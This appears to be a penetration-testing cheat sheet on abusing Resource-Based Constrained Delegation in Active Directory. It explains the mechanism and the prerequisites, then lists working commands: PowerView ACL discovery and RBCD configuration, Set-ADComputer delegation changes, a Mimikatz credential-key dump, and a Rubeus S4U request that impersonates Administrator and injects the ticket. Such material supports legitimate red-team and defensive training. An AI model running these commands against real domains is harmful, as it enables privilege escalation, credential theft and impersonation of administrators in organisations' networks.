- Resource Based Constrained Delegation
- This moves delegation authority to the resource/service administrator
- Instead of SPNs on
msDs-AllowedToDelegateToon the front-end service like the web service in this example, access in this case is controlled by security descriptor ofmsDS-AllowedToActOnBehalfOfOtherIdentity(visible asPrincipalsAllowedToDelegateToAccount) on the resource/service. - That is, the resource/service administrator can configure this delegation whereas for other types, SeEnableDelegation privileges are required which are, by default, available only to Domain Admins.
- The security descriptor on the second hop can determine who can access it, not the first hop.
To abuse RBCD in the most effective form, we just need two privileges
- Write permissions over the target service or object to configure msDs-AllowedtoActOnBehalfOfOtherIdentity
- Control over an object which has SPN configured (like admin access to a domain joined machine or ability to join a machine to domain - ms-DS-machineQuota is 10 for all domain users)
Find-InterestingDomainACL | ?{$_.identityreferencename -match 'username'}Get-DomainRBCDSet-DomainRBCD -Identity computer-name -DelegateFrom your-foothold$machine_accounts = 'pwned-machine-account1$', 'pwned-machine-account2$'
Set-ADComputer -Identity computer-name -PrincipalsAllowedToDelegateToAccount $machine_accountsInvoke-MimiKatz -Command '"sekurlsa::ekeys"'Rubeus.exe s4u /user:machine-account1$ /aes256:<aes256_key> /msdsspn:service/computer-name /impersonateuser:Administrator /ptt